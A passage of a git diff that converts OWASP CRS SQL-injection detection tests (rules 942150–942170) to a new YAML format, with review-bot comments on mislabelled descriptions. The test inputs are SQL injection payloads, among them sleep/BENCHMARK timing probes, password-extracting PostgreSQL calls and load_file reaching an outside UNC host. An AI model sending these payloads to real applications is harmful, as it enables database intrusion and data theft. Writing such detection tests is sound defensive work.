Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 19 desc: "SQLite 'glob' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" - version: HTTP/1.0 - output: - log_contains: id "942150" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml index 1b938cf..cd940dd 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml 
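Review bot: Test 5 (`+ - test_id: 5` followed directly by the `stages:` context line) is the only entry in 942150.yaml without a `desc`, so a failure of that case reports nothing about what it covers. Its payload is the same `select*from(select(sleep(N)))` shape that tests 7, 10 and 11 label "Advanced SQL injection", so `desc: "Advanced SQL injection"` would be consistent; the removed `test_title: 942150-5` had no desc either, so the migration carried the gap over rather than introducing it. Separately from the migration, the other descs only distinguish "Simple" from "Advanced" and do not say which construct the case exercises (JavaScript busy-loop, Python `time.sleep`, PHP `${...}` interpolation, SQLite `json`/`glob`), which is what a maintainer needs when one of them stops matching after a rule change.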
@@ -2,189 +2,188 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942151.yaml +rule_id: 942151 tests: - - test_title: 942151-1 + - test_id: 1 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo'||(select extractvalue(xmltype('%tocob;" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 3 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 4 desc: "Simple injection using 'fetch_in_set'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=, FIND_IN_SET('22', Category )" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=, FIND_IN_SET('22', Category )" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 5 desc: "SQL injection using 'likelihood' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 6 desc: "SQL injection using SQLite 'sqlite_compileoption_used' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 7 desc: "SQL injection using SQLite 'sqlite_compileoption_get' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-8 + - input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 8 desc: "SQL injection using PostgreSQL starts_with() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=starts_with(password,'a')::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=starts_with(password,'a')::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 9 desc: "SQL injection using PostgreSQL jsonb_pretty() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log: + 
expect_ids: [942151] + - test_id: 10 desc: "SQL injection using PostgreSQL json_build_object() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 11 desc: "SQL injection using unistr() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=unistr(password)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=unistr(password)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml index 6b2576b..8005783 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml 
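Review bot: The desc of test 4 in 942151.yaml names a function that does not appear in its payload: it reads `desc: "Simple injection using 'fetch_in_set'"` while the request body is `var=, FIND_IN_SET('22', Category )`. The migration copied the wording verbatim, so the mismatch survives on the new side; `desc: "Simple injection using 'find_in_set'"` matches what the case actually sends. The rest of the file follows the pattern of naming the exercised function (`likelihood`, `sqlite_compileoption_used`, `starts_with`, `jsonb_pretty`, `unistr`), so this is the one entry a reader cannot grep for.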
@@ -2,54 +2,53 @@
 meta:
 author: "Franziska Bühler, azurit"
 description: Various SQL injection tests
- enabled: true
- name: 942152.yaml
+rule_id: 942152
 tests:
- - test_title: 942152-1
+ - test_id: 1
 desc: "SQL injection in request header User-Agent"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942152"
- - test_title: 942152-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942152]
+ - test_id: 2
 desc: "SQL injection in request header User-Agent"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942152"
- - test_title: 942152-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942152]
+ - test_id: 3
 desc: "SQL injection in request header User-Agent"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: 
encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942152"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942152]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
index 86811fe..511fd3e 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
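Review bot: All three tests in 942152.yaml carry the identical `desc: "SQL injection in request header User-Agent"`, and tests 1 and 3 differ only in the `lo_get` argument (`%2816400%29` vs `%2816200%29`), so a failure report cannot tell them apart and the two `encode(lo_get(...))` cases read as a near-duplicate. Descriptions that name the construct would fix both, e.g. `desc: "PostgreSQL encode(lo_get()) in User-Agent"` for tests 1 and 3 and `desc: "PostgreSQL starts_with() in User-Agent"` for test 2. If test 3 is meant to cover a pattern distinct from test 1 that the rule's regex treats differently, its desc should state that; otherwise the two cases appear to pin the same match.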
@@ -1,175 +1,173 @@
---
meta:
author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit"
- description: None
- enabled: true
- name: 942160.yaml
+rule_id: 942160
tests:
- - test_title: 942160-1
+ - test_id: 1
desc: "SQL Injection Attack: Common DB Names Detected"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get?sql_table=sleep%28534543%29"
- version: HTTP/1.0
- output:
- log_contains: id "942160"
- - test_title: 942160-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?sql_table=sleep%28534543%29"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942160]
+ - test_id: 2
desc: "SQL Injection Attack: Common DB Names Detected"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "sleEP(3)"
- version: HTTP/1.0
- output:
- log_contains: id "942160"
- - test_title: 942160-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "sleEP(3)"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942160]
+ - test_id: 3
desc: "SQL Injection Attack: Common DB Names Detected"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "sleep(5000)"
- version: HTTP/1.0
- output:
- log_contains: id "942160"
- - test_title: 942160-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "sleep(5000)"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942160]
+ - test_id: 4
desc: "SQL Injection Attack: Common DB Names Detected"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "BENChmARk(2999/**/999,Md5(NoW()"
- version: HTTP/1.0
- output:
- log_contains: id "942160"
- - test_title: 942160-5
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "BENChmARk(2999/**/999,Md5(NoW()"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942160]
+ - test_id: 5
desc: "SQL Injection Attack: Common DB Names Detected"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "BEncHMARk(2999999,Md5(NoW('')"
- version: HTTP/1.0
- output:
- log_contains: id "942160"
- - test_title: 942160-6
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "BEncHMARk(2999999,Md5(NoW('')"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942160]
+ - test_id: 6
desc: "SQL Injection Attack: Common DB Names Detected"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "BENCHMARK(5000000,MD5(0x48416166)"
- version: HTTP/1.0
- output:
- log_contains: id "942160"
- - test_title: 942160-7
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "BENCHMARK(5000000,MD5(0x48416166)"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942160]
+ - test_id: 7
desc: "SQL Injection Attack: Common DB Names Detected"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "benchmark(3000000,M%445(4)"
- version: HTTP/1.0
- output:
- log_contains: id "942160"
- - test_title: 942160-8
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "benchmark(3000000,M%445(4)"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942160]
+ - test_id: 8
desc: "SQL Injection Attack: Common DB Names Detected"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')"
- version: HTTP/1.0
- output:
- log_contains: id "942160"
- - test_title: 942160-9
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942160]
+ - test_id: 9
desc: "SQL Injection Attack: Common DB Names Detected"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')"
- version: HTTP/1.0
- output:
- log_contains: id "942160"
- - test_title: 942160-10
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942160]
+ - test_id: 10
desc: "Detect blind SQLi attack in REQUEST_BASENAME. Issue #1904"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get/if(now()=sysdate(),sleep(12),0)"
- version: HTTP/1.0
- output:
- log_contains: id "942160"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get/if(now()=sysdate(),sleep(12),0)"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942160]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml
index 6dff839..44ce44b 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml
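Review bot: The `desc: "SQL Injection Attack: Common DB Names Detected"` carried over on tests 1–9 does not describe what these requests exercise: every payload is a `sleep(...)` or `BENCHMARK(...)` call, i.e. a time-based blind SQLi probe, so the text reads as copied from another rule's message. Descriptions naming the actual pattern, e.g. `desc: "Blind SQLi via sleep()"` for tests 1–3 and `desc: "Blind SQLi via BENCHMARK()"` for tests 4–9, would make a failing test self-explanatory. Separately, the POST tests 2–9 send `data` with no Content-Type header, unlike the JSON tests in 942290.yaml in this same commit which set it explicitly; presumably the runner's header auto-completion supplies `application/x-www-form-urlencoded`, but if it does not, the body is never parsed into ARGS and these tests would match (or not) for a reason other than the one intended, so it is worth confirming.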
@@ -1,71 +1,69 @@
---
meta:
author: "Franziska Bühler, azurit"
- description: None
- enabled: true
- name: 942170.yaml
+rule_id: 942170
tests:
- - test_title: 942170-1
+ - test_id: 1
desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B"
- version: HTTP/1.0
- output:
- log_contains: id "942170"
- - test_title: 942170-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942170]
+ - test_id: 2
desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get?var=%3B%20sleep%280%29"
- version: HTTP/1.0
- output:
- log_contains: id "942170"
- - test_title: 942170-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?var=%3B%20sleep%280%29"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942170]
+ - test_id: 3
desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get?var=I%20sleep%20well%21"
- version: HTTP/1.0
- output:
- no_log_contains: id "942170"
- - test_title: 942170-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?var=I%20sleep%20well%21"
+ version: HTTP/1.0
+ output:
+ log:
+ no_expect_ids: [942170]
+ - test_id: 4
desc: "Status Page Test - SQL injection test with select if(x"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
